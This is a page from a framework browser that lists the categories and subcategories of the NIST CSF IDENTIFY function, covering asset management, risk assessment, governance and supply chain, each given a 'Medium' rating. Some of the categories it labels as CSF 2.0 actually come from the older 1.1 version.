SecFrame Explorer
3/3
// Level 3 · Controls

IDENTIFY

NIST CSF 2.0 IDENTIFY function — categories and subcategories.

ID.AMMedium

Asset Management

Assets (e.g., data, hardware, software, systems, facilities, services, people) that enable the organization to achieve business purposes are identified and managed consistent with their relative importance to organizational objectives and the organization's risk strategy

ID.AM-01Medium

ID.AM-01

Inventories of hardware managed by the organization are maintained

ID.AM-02Medium

ID.AM-02

Inventories of software, services, and systems managed by the organization are maintained

ID.AM-03Medium

ID.AM-03

Representations of the organization's authorized network communication and internal and external network data flows are maintained

ID.AM-04Medium

ID.AM-04

Inventories of services provided by suppliers are maintained

ID.AM-05Medium

ID.AM-05

Assets are prioritized based on classification, criticality, resources, and impact on the mission

ID.AM-06Medium

ID.AM-06

Cybersecurity roles and responsibilities for the entire workforce and third-party stakeholders (e.g., suppliers, customers, partners) are established

ID.AM-07Medium

ID.AM-07

Inventories of data and corresponding metadata for designated data types are maintained

ID.AM-08Medium

ID.AM-08

Systems, hardware, software, services, and data are managed throughout their life cycles

ID.BEMedium

Business Environment

Business Environment

ID.BE-01Medium

ID.BE-01

The organization’s role in the supply chain is identified and communicated

ID.BE-02Medium

ID.BE-02

The organization’s place in critical infrastructure and its industry sector is identified and communicated

ID.BE-03Medium

ID.BE-03

Priorities for organizational mission, objectives, and activities are established and communicated

ID.BE-04Medium

ID.BE-04

Dependencies and critical functions for delivery of critical services are established

ID.BE-05Medium

ID.BE-05

Resilience requirements to support delivery of critical services are established for all operating states (e.g. under duress/attack, during recovery, normal operations)

ID.GVMedium

Governance

Governance

ID.GV-01Medium

ID.GV-01

Organizational cybersecurity policy is established and communicated

ID.GV-02Medium

ID.GV-02

Cybersecurity roles and responsibilities are coordinated and aligned with internal roles and external partners

ID.GV-03Medium

ID.GV-03

Legal and regulatory requirements regarding cybersecurity, including privacy and civil liberties obligations, are understood and managed

ID.GV-04Medium

ID.GV-04

Governance and risk management processes address cybersecurity risks

ID.IMMedium

Improvement

Improvements to organizational cybersecurity risk management processes, procedures and activities are identified across all CSF Functions

ID.IM-01Medium

ID.IM-01

Improvements are identified from evaluations

ID.IM-02Medium

ID.IM-02

Improvements are identified from security tests and exercises, including those done in coordination with suppliers and relevant third parties

ID.IM-03Medium

ID.IM-03

Improvements are identified from execution of operational processes, procedures, and activities

ID.IM-04Medium

ID.IM-04

Incident response plans and other cybersecurity plans that affect operations are established, communicated, maintained, and improved

ID.RAMedium

Risk Assessment

The cybersecurity risk to the organization, assets, and individuals is understood by the organization

ID.RA-01Medium

ID.RA-01

Vulnerabilities in assets are identified, validated, and recorded

ID.RA-02Medium

ID.RA-02

Cyber threat intelligence is received from information sharing forums and sources

ID.RA-03Medium

ID.RA-03

Internal and external threats to the organization are identified and recorded

ID.RA-04Medium

ID.RA-04

Potential impacts and likelihoods of threats exploiting vulnerabilities are identified and recorded

ID.RA-05Medium

ID.RA-05

Threats, vulnerabilities, likelihoods, and impacts are used to understand inherent risk and inform risk response prioritization

ID.RA-06Medium

ID.RA-06

Risk responses are chosen, prioritized, planned, tracked, and communicated

ID.RA-07Medium

ID.RA-07

Changes and exceptions are managed, assessed for risk impact, recorded, and tracked

ID.RA-08Medium

ID.RA-08

Processes for receiving, analyzing, and responding to vulnerability disclosures are established

ID.RA-09Medium

ID.RA-09

The authenticity and integrity of hardware and software are assessed prior to acquisition and use

ID.RA-10Medium

ID.RA-10

Critical suppliers are assessed prior to acquisition

ID.RMMedium

Risk Management Strategy

Risk Management Strategy

ID.RM-01Medium

ID.RM-01

Risk management processes are established, managed, and agreed to by organizational stakeholders

ID.RM-02Medium

ID.RM-02

Organizational risk tolerance is determined and clearly expressed

ID.RM-03Medium

ID.RM-03

The organization’s determination of risk tolerance is informed by its role in critical infrastructure and sector specific risk analysis

ID.SCMedium

Supply Chain Risk Management

Supply Chain Risk Management

ID.SC-01Medium

ID.SC-01

Cyber supply chain risk management processes are identified, established, assessed, managed, and agreed to by organizational stakeholders

ID.SC-02Medium

ID.SC-02

Suppliers and third party partners of information systems, components, and services are identified, prioritized, and assessed using a cyber supply chain risk assessment process

ID.SC-03Medium

ID.SC-03

Contracts with suppliers and third-party partners are used to implement appropriate measures designed to meet the objectives of an organization’s cybersecurity program and Cyber Supply Chain Risk Management Plan.

ID.SC-04Medium

ID.SC-04

Suppliers and third-party partners are routinely assessed using audits, test results, or other forms of evaluations to confirm they are meeting their contractual obligations.

ID.SC-05Medium

ID.SC-05

Response and recovery planning and testing are conducted with suppliers and third-party providers